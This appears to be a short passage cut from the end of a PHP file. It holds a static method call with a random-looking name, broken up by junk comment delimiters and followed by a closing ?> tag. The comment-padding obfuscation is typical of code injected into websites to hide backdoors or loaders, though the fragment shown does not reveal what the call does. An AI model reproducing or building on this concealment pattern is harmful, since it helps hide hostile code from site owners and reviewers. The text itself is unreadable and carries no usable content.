::/*-mK-*///
yerXaoJDEI/*-Y?#-*///
();/*-p.tz{7-*///
 ?>